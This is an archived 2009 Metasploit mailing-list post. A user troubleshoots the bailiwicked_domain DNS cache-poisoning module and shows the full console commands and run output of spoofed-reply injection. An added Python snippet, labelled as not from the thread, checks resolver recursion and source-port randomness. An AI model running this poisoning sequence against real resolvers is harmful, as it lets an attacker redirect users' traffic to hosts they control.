Metasploit mailing list archives
bailiwicked_domain not working anymore?
From: richard.k.miles at googlemail.com (Richard Miles)
Date: Mon, 20 Jul 2009 09:58:09 -0500
Yo, I recently tested the bailiwicked_domain exploit from Metasploit against 2 different servers, and both failed the exploitation. Both servers show to be vulnerable, similar to this output:

porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net. "myDNSserver is POOR: 26 queries in 1.9 seconds from 26 ports with std dev 7"

I used this test:

dig +short porttest.dns-oarc.net TXT @myDNSserver

Both DNS servers show to be vulnerable (POOR).

When exploiting with Metasploit, the first problem is that "check" always fails, saying my DNS doesn't accept recursive queries.

msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] ERROR: This server is not replying to recursive requests

That is completely wrong; my server accepts recursive queries. Even if I quit Metasploit, or even open another terminal, I can query ANY host on the internet. Is it a known problem?

Well, anyway, I tried to exploit the flaw using this:

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST myDNSserver
RHOST => myDNSserver
msf auxiliary(bailiwicked_domain) > set DOMAIN sexy.com
DOMAIN => sexy.com
msf auxiliary(bailiwicked_domain) > set NEWDNS www.google.com
NEWDNS => www.google.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > exploit
[*] Targeting nameserver myDNSserver for injection of sexy.com. nameservers as www.google.com
[*] Querying recon nameserver for sexy.com.'s nameservers...
[*] Got an NS record: XXXXXXXXXXXXXXXX
[*] Removed: It's just DNS resolution.
[*] Calculating the number of spoofed replies to send per query...
[*] race calc: 100 queries | min/max/avg time: 0.04/0.17/0.07 | min/max/avg replies: 4/67/28
[*] Sending 14 spoofed replies from each nameserver (3) for each query
[*] Attempting to inject poison records for sexy.com.'s nameservers into myDNSserver:0...
[*] Sent 1000 queries and 42000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*] race calc: 25 queries | min/max/avg time: 0.04/103.53/4.22 | min/max/avg replies: 3/65337/2633
[*] Now sending 1316 spoofed replies from each nameserver (3) for each query

And Metasploit stays in this stage for a long time (at the moment, more than 1 hour). Is there anything wrong with the exploit? Or am I using it wrong? I'm following this tutorial: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Any tips are welcome. Thanks.
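The two diagnostics the post leans on, "does this server answer recursive queries" and "how random are its outbound source ports", can both be reproduced from first principles. The following is an added example, not code from the poster, from Metasploit or from DNS-OARC: it builds a raw DNS query with the RD bit set, decodes the RA bit (recursion available) from a reply header, and summarises a list of observed source ports the way the porttest TXT line does (query count, distinct ports, standard deviation). The port list would normally come from a capture on the resolver's upstream interface; here it is constructed. The POOR/GOOD threshold in `assess_source_ports` is this example's own assumption, not DNS-OARC's published cut-off. Note that a resolver with a recursion ACL will set RA for LAN clients (where `dig` was run) but can refuse recursion to an outside vantage point such as the external service the module's `check` uses, which is one benign way the two results can disagree.

```python
import random
import socket
import statistics
import struct

DNS_PORT = 53
QTYPE_TXT = 16   # the record type the OARC porttest replies with


def build_query(txid, qname, qtype=QTYPE_TXT, rd=True):
    """Minimal DNS query on the wire: 12-byte header, QNAME labels, QTYPE, QCLASS=IN.
    RD=1 asks the server to recurse, which is what a recursion check must send."""
    flags = 0x0100 if rd else 0x0000            # RD is bit 8 of the flags word
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    labels = qname.rstrip(".").split(".")
    qname_wire = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname_wire + struct.pack("!HH", qtype, 1)


def parse_header(resp):
    """Decode the 12-byte DNS header of a reply into its flag bits."""
    if len(resp) < 12:
        raise ValueError("short DNS message")
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", resp[:12])
    return {
        "id": txid,
        "qr": bool(flags & 0x8000),    # 1 = this is a response
        "tc": bool(flags & 0x0200),    # truncated; retry over TCP
        "rd": bool(flags & 0x0100),    # echoed back from our query
        "ra": bool(flags & 0x0080),    # server is willing to recurse for this client
        "rcode": flags & 0x000F,       # 0 NOERROR, 3 NXDOMAIN, 5 REFUSED
        "ancount": an,
    }


def recursion_available(resp, expected_id):
    """True only if the reply carries our transaction ID, is a response, and sets RA."""
    h = parse_header(resp)
    return h["id"] == expected_id and h["qr"] and h["ra"]


def check_resolver(resolver_ip, qname="porttest.dns-oarc.net", timeout=3.0):
    """Live check against one resolver (needs network; not exercised offline)."""
    txid = random.randrange(0, 0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(txid, qname), (resolver_ip, DNS_PORT))
        resp, _ = s.recvfrom(4096)
    return {**parse_header(resp), "recursion_available": recursion_available(resp, txid)}


def assess_source_ports(ports, poor_below=100.0):
    """Summarise the source ports a resolver used for its outbound queries, in the
    style of the porttest line quoted in the post. The 'poor_below' std-dev cut-off
    is an assumption made for this example, not DNS-OARC's threshold."""
    if len(ports) < 2:
        raise ValueError("need at least two observations")
    stdev = statistics.pstdev(ports)
    distinct = len(set(ports))
    verdict = "POOR" if stdev < poor_below or distinct < len(ports) // 2 else "GOOD"
    return {"queries": len(ports), "distinct_ports": distinct,
            "stdev": round(stdev, 1), "verdict": verdict}


def constructed_random_ports(n=200, seed=1):
    """Constructed sample: what a port-randomising resolver's capture would look like."""
    rng = random.Random(seed)
    return [rng.randint(1024, 65535) for _ in range(n)]


if __name__ == "__main__":
    # Constructed sample of a resolver walking sequential ports (26 queries, std dev 7.5).
    sequential = list(range(32768, 32768 + 26))
    print(assess_source_ports(sequential))
    print(assess_source_ports(constructed_random_ports()))
    # Constructed reply header: ID 0x1234, QR|RD|RA set, NOERROR, one question.
    reply = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 0, 0, 0)
    print(recursion_available(reply, 0x1234))
```

`check_resolver("192.0.2.53")` (a documentation address, substitute your resolver) returns the decoded header for a live server; compare the `ra` value seen from inside the network with the one seen from an external host to tell a recursion ACL apart from a server that really does not recurse.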
Current thread:
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- Error while running meterpreter winenum script wfdawson at bellsouth.net (Jul 21)
- Error while running meterpreter winenum script Carlos Pérez (Jul 21)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)